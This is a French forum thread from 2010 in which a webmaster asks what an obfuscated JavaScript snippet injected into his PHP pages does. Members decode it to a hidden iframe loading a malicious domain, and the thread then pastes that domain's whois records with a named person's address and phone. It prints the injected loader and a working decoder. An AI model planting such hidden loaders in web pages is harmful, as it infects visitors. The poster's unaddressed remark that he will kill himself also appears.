Partage

Pirate (experts en sécurité)

Trouver à quoi sert un code

21 août 2010 à 19:35:02

Bonjour,

Il y à quelques jours, je ne pouvais plus accéder aux pages php de mes sites, le logiciel Avast me bloquait l'accès.
Voici le screenshot:
Image utilisateur

J'ai donc cherché et découvert dans mes pages php une ligne de javascript, la voici:

<script>var KewSanac='fQbr5RRoImVCshUaMxrwICsiLoPndl9VeAD'.replace(/[Qb5RRIVsUMxwIsiLPnl9VAD]/g, '');ReNev='rehanejavecelexejajekeq';var YeweKevedi=parseInt;var PalahBereqt='netehan zecev temewes xegayepeperereja kevatak seke nagetawe jeqede baleyaf penasewerezeqe peweyex ragara jededes mawehekezefeyep besebeke paqec kam capavaqefeqaveh sabawexe kecajeve mesazeja deh kahezep hexewalece nexegeka qateq qekezam lerepe har qeheqabel car radeneme sece recaparewebec kefaqej lavehahele jesaner besekay leweweva nek jekerex ze cepahet cetajaqesefaze petewep bexexa neq j mevasece kaze zelaqat seke mahadabe wey fesebej rezereqemakekave pafaheg detawenecefay feqefaf nebeyehecesed bebeyen fasejacete gevanaw zazeveyecerawej pewacen catehave gexe wevekenademage mef pel dewelek xehefapexeyepew papekez mexalehewaderere mal ket jaj d cetexebe kezareve nalalak wewexekeve tegaceh sajew jarepawe garep geqesaw zedevecas kexa lageqaxegenaba rew fec vale qe led zef jat r begadal qevetaxev serelax bedeya perehem zaqayebepe hamevew fenanava yageleh dewebareg geyekeye vebaq jebe qekepaceveyaje mar tep xega ne hah yek wez p wanawal gef gasadeb degecefeqedamehe gagaveha sag qelajan vameg geqelaq qapefe vaweleya xay qewe dezalaranajema mam hat gave x qag zed med m newehej kadadaq zarebege bef peregex le beveger betagebepeheka xaxanen vekeke zenejax nah yaqelex betenabesarekede zafexeta yeb jejapac qabaw hekegab jawaqa hahadeha laf baje sededelebaqare rew har sexe x mav vel veg z bewexane xena qadateje neh cazewem kale yare lecatewejefede cat seg hexevem lefekatez dacakece wezek qejevapa kexaw zaqevele x teje febaxapeveb sej xehaqegazefalapa yaw hegefetamehalefa datedah wej nefayex ceseyesevaday badezed ce kejaleb jala wehaseg pehetegedeje jeqacale vev telaxeze zewedeweta vet mehekevelatedec medebet dele faxehar lekegememexagehe ganexeq relemebeveweme mas badenageretabehe zeleset zese nefaxev jasahanewenewade qejezece fepele jajakey yevakafakakewel benevawe veker saka pec caje xe web nelemacetapehej tepanafe m refemal qecevabaq dexadame s yag mek lehe xayerenamevasaq beta wacevazayexac fas levateyewedalefe pedewab qeheqeceqe javefaj teqaxex rewazepe wek xezagag ka cagebet xegaqemeqageqa kecakeg dagawa texe xefevemelewajem sez wazaheja kar deyazefaje'.split(' ');var SaWavn=33;SaWavn+=-17;ReKeze='lejetezatayafanevekegegaxay';var BaceKepaqn='';var PeyLaps=String;var SegFefebo=11;SegFefebo+=-9;DasCesa=96;var BerKasee=29;BerKasee+=-28;QabePe='gekepajayedayabepevedejer';var SepeYeje='e2v3PaGZltiP'.replace(/[23PGZtiP]/g, '');DejeSehaf=40;var WarekQabw=window;var RakeqYafelo=47;RakeqYafelo+=-47;HexatWen=4;SepeYeje=WarekQabw[SepeYeje];KewSanac=PeyLaps[KewSanac];for (ReYei=RakeqYafelo;ReYei<PalahBereqt.length-1;ReYei+=SegFefebo) BaceKepaqn += KewSanac(YeweKevedi((PalahBereqt[ReYei+RakeqYafelo].length-1).toString(SaWavn)+(PalahBereqt[ReYei+BerKasee].length-1).toString(SaWavn), SaWavn));SepeYeje(BaceKepaqn);</script>

Je l'ai indenté pour plus de lisibilité:

<script>

var KewSanac='fQbr5RRoImVCshUaMxrwICsiLoPndl9VeAD'.replace(/[Qb5RRIVsUMxwIsiLPnl9VAD]/g, '');
ReNev='rehanejavecelexejajekeq';
var YeweKevedi=parseInt;
var PalahBereqt='netehan zecev temewes xegayepeperereja kevatak seke nagetawe jeqede baleyaf penasewerezeqe peweyex ragara jededes mawehekezefeyep besebeke paqec kam capavaqefeqaveh sabawexe kecajeve mesazeja deh kahezep hexewalece nexegeka qateq qekezam lerepe har qeheqabel car radeneme sece recaparewebec kefaqej lavehahele jesaner besekay leweweva nek jekerex ze cepahet cetajaqesefaze petewep bexexa neq j mevasece kaze zelaqat seke mahadabe wey fesebej rezereqemakekave pafaheg detawenecefay feqefaf nebeyehecesed bebeyen fasejacete gevanaw zazeveyecerawej pewacen catehave gexe wevekenademage mef pel dewelek xehefapexeyepew papekez mexalehewaderere mal ket jaj d cetexebe kezareve nalalak wewexekeve tegaceh sajew jarepawe garep geqesaw zedevecas kexa lageqaxegenaba rew fec vale qe led zef jat r begadal qevetaxev serelax bedeya perehem zaqayebepe hamevew fenanava yageleh dewebareg geyekeye vebaq jebe qekepaceveyaje mar tep xega ne hah yek wez p wanawal gef gasadeb degecefeqedamehe gagaveha sag qelajan vameg geqelaq qapefe vaweleya xay qewe dezalaranajema mam hat gave x qag zed med m newehej kadadaq zarebege bef peregex le beveger betagebepeheka xaxanen vekeke zenejax nah yaqelex betenabesarekede zafexeta yeb jejapac qabaw hekegab jawaqa hahadeha laf baje sededelebaqare rew har sexe x mav vel veg z bewexane xena qadateje neh cazewem kale yare lecatewejefede cat seg hexevem lefekatez dacakece wezek qejevapa kexaw zaqevele x teje febaxapeveb sej xehaqegazefalapa yaw hegefetamehalefa datedah wej nefayex ceseyesevaday badezed ce kejaleb jala wehaseg pehetegedeje jeqacale vev telaxeze zewedeweta vet mehekevelatedec medebet dele faxehar lekegememexagehe ganexeq relemebeveweme mas badenageretabehe zeleset zese nefaxev jasahanewenewade qejezece fepele jajakey yevakafakakewel benevawe veker saka pec caje xe web nelemacetapehej tepanafe m refemal qecevabaq dexadame s yag mek lehe xayerenamevasaq beta wacevazayexac fas levateyewedalefe pedewab qeheqeceqe javefaj teqaxex rewazepe wek xezagag ka cagebet xegaqemeqageqa kecakeg dagawa texe xefevemelewajem sez wazaheja kar deyazefaje'.split(' ');

var SaWavn=33;
SaWavn+=-17;
ReKeze='lejetezatayafanevekegegaxay';

var BaceKepaqn='';
var PeyLaps=String;
var SegFefebo=11;

SegFefebo+=-9;
DasCesa=96;
var BerKasee=29;
BerKasee+=-28;
QabePe='gekepajayedayabepevedejer';
var SepeYeje='e2v3PaGZltiP'.replace(/[23PGZtiP]/g, '');
DejeSehaf=40;
var WarekQabw=window;
var RakeqYafelo=47;
RakeqYafelo+=-47;
HexatWen=4;
SepeYeje=WarekQabw[SepeYeje];
KewSanac=PeyLaps[KewSanac];
for (ReYei=RakeqYafelo; ReYei<PalahBereqt.length-1; ReYei+=SegFefebo)
BaceKepaqn += KewSanac(YeweKevedi((PalahBereqt[ReYei+RakeqYafelo].length-1).toString(SaWavn)+(PalahBereqt[ReYei+BerKasee].length-1).toString(SaWavn), SaWavn));
SepeYeje(BaceKepaqn);

</script>

Je cherche à savoir ce qu'elle fait, pouvez vous m'aider s'il vous plait à la comprendre?
Pour des raisons de sécurité évidentes j'ai vidé mon serveur.

La leçon c'est: faites des sites internet, vous ne serez jamais assez remercié, vous verrez.

Anonyme

21 août 2010 à 19:38:36

a tous les coups ça ajoute une iframe vers un site qui a des virus.

T'as fais un fopen, ou file_get_contents non protégé probablement.

Totony

21 août 2010 à 19:46:43

http://safebrowsing.clients.google.com [...] lvafilms.com/

EMC1

21 août 2010 à 19:54:22

J'ai pas pensé à te répondre ici, j'ai posté mon message sur le forum Java.

Edit: Ce sont les hackers les experts en sécurité.

Totony

21 août 2010 à 19:59:06

Comment peuvent-ils installer des choses sur les ordinateurs des gens via JS ? Le Java demande (quasiment) toujours la permission et le flash... ben c'est peut-être du flash aussi...

Cryde

21 août 2010 à 20:42:36

Fallait quand même y pensé

Mes projets : WhoisRedJohn, fatidique et MusicAll. Mon Github

sylvainmahe

21 août 2010 à 23:54:46

Ok merci.

Moi sa m'hallucinera toujours ce truc, tu fait des sites pour les autres, pour créer des services et tout, ca ne te rapporte rien, et on vient te casser ce que tu fait, c'est vraiment incroyable...

Et la je m'adresse au hacker qui m'a fait ca et qui lit forcément ses lignes (puisque c'est un membre du site du zéro je le sais):

Tu veux me piquer de l'argent? C'est ca que tu veux? Et bien ca va être difficile car je suis au chomage abruti et j'ai pas un rond!!! Alors laisse moi tranquille!!

En plus tu as piraté mon cv ce qui fait que aucun employeur ne pouvait le voir! Mais merci car grace à toi je sais maintenant que je ne sert à rien du tout et je vais me tuer!!

jojo02310

22 août 2010 à 0:40:33

Dernière solution, tracage d'IP, ensuite dépôt de plainte... et tout passe par la justice ensuite... si tu a des preuves et tout...

TWal

22 août 2010 à 14:26:34

J'ai trouvé ce que c'est :

document.write('<iframe scrolling="no" width="1" height="1" border="0" frameborder="0" src="http://blackry.com/count21.php"></iframe>')

Comme le disait nod_, ça rajoute un iframe.

J'ai décodé le code, je le mets ici.

var PalahBereqt='netehan zecev temewes xegayepeperereja kevatak seke nagetawe jeqede baleyaf penasewerezeqe peweyex ragara jededes mawehekezefeyep besebeke paqec kam capavaqefeqaveh sabawexe kecajeve mesazeja deh kahezep hexewalece nexegeka qateq qekezam lerepe har qeheqabel car radeneme sece recaparewebec kefaqej lavehahele jesaner besekay leweweva nek jekerex ze cepahet cetajaqesefaze petewep bexexa neq j mevasece kaze zelaqat seke mahadabe wey fesebej rezereqemakekave pafaheg detawenecefay feqefaf nebeyehecesed bebeyen fasejacete gevanaw zazeveyecerawej pewacen catehave gexe wevekenademage mef pel dewelek xehefapexeyepew papekez mexalehewaderere mal ket jaj d cetexebe kezareve nalalak wewexekeve tegaceh sajew jarepawe garep geqesaw zedevecas kexa lageqaxegenaba rew fec vale qe led zef jat r begadal qevetaxev serelax bedeya perehem zaqayebepe hamevew fenanava yageleh dewebareg geyekeye vebaq jebe qekepaceveyaje mar tep xega ne hah yek wez p wanawal gef gasadeb degecefeqedamehe gagaveha sag qelajan vameg geqelaq qapefe vaweleya xay qewe dezalaranajema mam hat gave x qag zed med m newehej kadadaq zarebege bef peregex le beveger betagebepeheka xaxanen vekeke zenejax nah yaqelex betenabesarekede zafexeta yeb jejapac qabaw hekegab jawaqa hahadeha laf baje sededelebaqare rew har sexe x mav vel veg z bewexane xena qadateje neh cazewem kale yare lecatewejefede cat seg hexevem lefekatez dacakece wezek qejevapa kexaw zaqevele x teje febaxapeveb sej xehaqegazefalapa yaw hegefetamehalefa datedah wej nefayex ceseyesevaday badezed ce kejaleb jala wehaseg pehetegedeje jeqacale vev telaxeze zewedeweta vet mehekevelatedec medebet dele faxehar lekegememexagehe ganexeq relemebeveweme mas badenageretabehe zeleset zese nefaxev jasahanewenewade qejezece fepele jajakey yevakafakakewel benevawe veker saka pec caje xe web nelemacetapehej tepanafe m refemal qecevabaq dexadame s yag mek lehe xayerenamevasaq beta wacevazayexac fas levateyewedalefe pedewab qeheqeceqe javefaj teqaxex rewazepe wek xezagag ka cagebet xegaqemeqageqa kecakeg dagawa texe xefevemelewajem sez wazaheja kar deyazefaje'.split(' ');

var buffer = ""

for (i=0; i<PalahBereqt.length-1; i+=2)
	buffer += String.fromCharCode(parseInt((PalahBereqt[i].length-1).toString(16)+(PalahBereqt[i+1].length-1).toString(16), 16));

alert(buffer);
//Ca fait eval(buffer) normalement, ce qui execute le code dedans.

Je sais pas pourquoi j'avais une extrême envie de décoder ça ...

Shivaan

22 août 2010 à 14:38:52

Semblant de rien, elle est intéressante, cette méthode d'encodage. J'aimerais bien connaître le script qui permette de générer une telle string (oui je sais, suffit de faire l'inverse)

Directeur technique, créateur de jeux HTML5 et fan de JavaScript | La suite de OnHack est sur les rails !

sylvainmahe

14 septembre 2010 à 12:23:07

Savez vous comment faire en sorte que mon serveur ne soit plus représenté comme pouvant occasionner une menace?
Car beaucoups de gens se pleignent de ne pas pouvoir accéder à des fichiers que je leurs met sur mon serveur? :euh:

Leur navigateur dit: Ce site est potentielement dangereux, etc...

C'est auprès de mon hébergeur que je doit voir ca non?

Et sinon autre question, pensez vous que la police puisse faire quelque chose avec ca?

Nom de la société : Anton Govoruhin ()

* Trouver "Anton Govoruhin ()" sur le Kompass.
* Trouver "Anton Govoruhin ()" sur Google.

Contact administratif
Nom de la société : Anton Govoruhin ()

* Trouver "Anton Govoruhin ()" sur le Kompass.
* Trouver "Anton Govoruhin ()" sur Google.

Registre
Nom de la société : enom, inc.

* Trouver "enom" sur le Kompass.
* Trouver "enom" sur Google.

Serveurs de nom
dns2.name-services.com Qui est-ce ?
dns3.name-services.com Qui est-ce ?
dns4.name-services.com Qui est-ce ?
dns5.name-services.com Qui est-ce ?
dns1.name-services.com Qui est-ce ?
Whois brut primaire
Heure de constat : 22-08-2010 23:40
Serveur Whois interrogé : whois.verisign-grs.com

Whois Server Version 2.0
Domain names in the .com and .net domains can now be registered
with many different competing registrars. Go to http://www.internic.net
for detailed information.
Domain Name: BLACKRY.COM
Registrar ENOM, INC.
Whois Server: whois.enom.com
Referral URL: http://www.enom.com
Name Server: DNS1.NAME-SERVICES.COM
Name Server: DNS2.NAME-SERVICES.COM
Name Server: DNS3.NAME-SERVICES.COM
Name Server: DNS4.NAME-SERVICES.COM
Name Server: DNS5.NAME-SERVICES.COM
Status: clientTransferProhibited
Updated Date: 17-aug-2010
Creation Date: 17-aug-2010
Expiration Date: 17-aug-2011
>>> Last update of whois database: Sun, 22 Aug 2010 21:39:27 UTC <<<
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar s Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Whois brut secondaire
Heure de constat : 22-08-2010 23:40
Serveur Whois interrogé : whois.enom.com
=-=-=-=
Visit AboutUs.org for more information about blackry.com
http://www.aboutus.org/blackry.com >AboutUs: blackry.com
Registration Service Provided By Ruler Domains
Contact: mail@ruldmns.com

Domain name: blackry.com
Registrant Contact:

Anton Govoruhin ()

Fax:
Kaminskogo street 6, fl. 13
Tula, 300041
RU
Administrative Contact:

Anton Govoruhin ( info@blackry.com
8 4872 723348
Fax:
Kaminskogo street 6, fl. 13
Tula, 300041
RU
Technical Contact:

Anton Govoruhin (info@blackry.com)
8 4872 723348
Fax:
Kaminskogo street 6, fl. 13
Tula, 300041
RU
Status: Locked
Name Servers:
dns1.name-services.com
dns2.name-services.com
dns3.name-services.com
dns4.name-services.com
dns5.name-services.com

Creation date: 17 Aug 2010 13:36:00
Expiration date: 17 Aug 2011 08:36:00

Get Noticed on the Internet! Increase visibility for this domain name by listing it at www.whoisbusinesslistings.com
=-=-=-=
The data in this whois database is provided to you for information
purposes only, that is, to assist you in obtaining information about or
related to a domain name registration record. We make this information
available "as is," and do not guarantee its accuracy. By submitting a
whois query, you agree that you will use this data only for lawful
purposes and that, under no circumstances will you use this data to: (1)
enable high volume, automated, electronic processes that stress or load
this whois database system providing you this information; or (2) allow,
enable, or otherwise support the transmission of mass unsolicited,
commercial advertising or solicitations via direct mail, electronic
mail, or by telephone. The compilation, repackaging, dissemination or
other use of this data is expressly prohibited without prior written
consent from us.
We reserve the right to modify these terms at any time. By submitting
this query, you agree to abide by these terms.
Version 6.3 4/3/2002